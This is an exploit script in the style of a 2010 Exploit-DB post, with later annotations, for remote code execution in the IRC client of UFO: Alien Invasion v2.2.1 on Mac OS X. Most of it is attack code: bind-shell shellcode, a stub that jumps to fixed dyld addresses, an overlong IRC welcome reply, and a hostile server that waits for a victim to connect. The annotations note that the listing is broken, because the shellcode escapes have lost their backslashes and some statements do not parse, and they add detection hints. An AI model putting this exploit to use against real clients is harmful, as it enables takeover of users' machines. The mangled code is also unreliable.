
# Title : UFO: Alien Invasion v2.2.1 Remote Code Execution (OSX)
# Published : 2010-06-28
# Author : dookie


#!/usr/bin/python
#
# UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - MacOSX
# Author: dookie
# Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013
#
import sys, socket, struct

# msfpayload osx/x86/vforkshell_bind_tcp R | msfencode -b 'x00x0ax0d' -t c

# NOTE(review): as rendered in this listing the string literals below (e.g. "x90")
# are plain ASCII text, not the binary byte values the comment above describes,
# and the script is not runnable as shown. Treat the listing as a historical
# record of the technique, useful for writing detections, not as working code.
# Target per the header: UFO: Alien Invasion v2.2.1 IRC client on Mac OS X.
shellcode = "x90" * 16
shellcode += ("xdbxc3xd9x74x24xf4xbbxf3xbdx8dx7cx33xc9x5dxb1"
"x27x31x5dx18x03x5dx18x83xc5xf7x5fx78x4dx37x06"
"xd3xeexe7x79x84xbcxb7x1bxe9xc1xb8x59x8fxc1xc6"
"x5dxf9x04x94x0fxabxe0x18xb2x5axadx91x51x36x5d"
"xf2xc3x95xedx9cx26x99x7cx3bxebxccxd2x73x61x3c"
"x52x01x28xecx01xb3x86xa0xb8xf6xa7xb3x90x81x6f"
"x02xc2x12x84x64xb7x47x0cx34x87x3dx7fx3ax95x82"
"xfcxc0x59x71xf2x06x9ex29xa4x38x4ex79x7fx74xee"
"xe9x10xbaxc2x7cx18x73x5exb3x9axf0xa5x4bxefxe1"
"x68x8bx5fx66xa4x24x13x1exd2x15xb1xb7x4cxe0xd6"
"x18xc1xa1x48x29xdax88xe9x78xddx42x63x99x8dx32"
"x20x0ex7ex02xc1x63xfex53x0ex2bxafxd3x43x4cx45")

#### Exec Payload From Heap Stub (By Dino Dai Zovi) ####
frag0 = "x90x58x61xc3"
frag1 = "x90x58x89xe0x83xc0x0cx89x44x24x08xc3"

# Hard-coded absolute addresses inside one specific /usr/lib/dyld build.
# Defensive note: the whole stub is tied to that exact library layout, so any
# other dyld build, or dyld loaded at a randomized base, invalidates these
# constants; the dependence on a fixed, predictable library address is the
# weakness that load-address randomization removes.
writeable = 0x8fe66448          # writeable memory location in /usr/lib/dyld
setjmp = 0x8fe1cf38             # t _setjmp in /usr/lib/dyld
strdup = 0x8fe210dc             # t _strdup in /usr/lib/dyld
jmpeax = 0x8fe01041             # jmp eax in /usr/lib/dyld

# NOTE(review): this statement is split across three physical lines with no
# continuation marker in the listing; as rendered it does not parse.
stub = frag0 + struct.pack('<III',setjmp,writeable+32,writeable) + 
frag1 + 'A' * 20 + struct.pack('<IIIII',setjmp,writeable+24,writeable,strdup,jmpeax) + 
'A' * 4

# The hostile server reply: IRC numeric 001 (RPL_WELCOME) followed by 524 filler
# bytes, the stub and the payload, terminated by CRLF. Detection hint: a single
# inbound IRC line of this size far exceeds the 512-character message limit of
# RFC 2812, so a length check on server-to-client messages (or an IDS rule on an
# oversized "001 :" reply) is a simple, low-false-positive network signature.
sploit = "001 :"
sploit += "x41" * 524
sploit += stub
sploit += shellcode
sploit += "x0dx0a"
#sploit = lead

# Attacker-as-server scenario: listens on every interface on the standard IRC
# port and waits for a victim client to connect. The exposure is a v2.2.1 client
# pointed at an untrusted or attacker-controlled IRC server; the client-side fix
# is an updated build, the network-side control is restricting which IRC servers
# the game client may reach.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 6667))
s.listen(1)
print ("[*] Listening on port 6667.")
print ("[*] Have someone connect to you.")
print ("[*] Type <control>-c to exit.")
conn, addr = s.accept()
# Python 2 print statement; this line does not parse under Python 3.
print '[*] Received connection from: ', addr

# One send, then the script ends; there is no read of the client's registration
# (NICK/USER), so the reply is sent regardless of what the client says.
conn.send(sploit)
# NOTE: attribute reference only; close() is never actually called, so the
# connection is left open until process exit. Also note `s` is never closed.
conn.close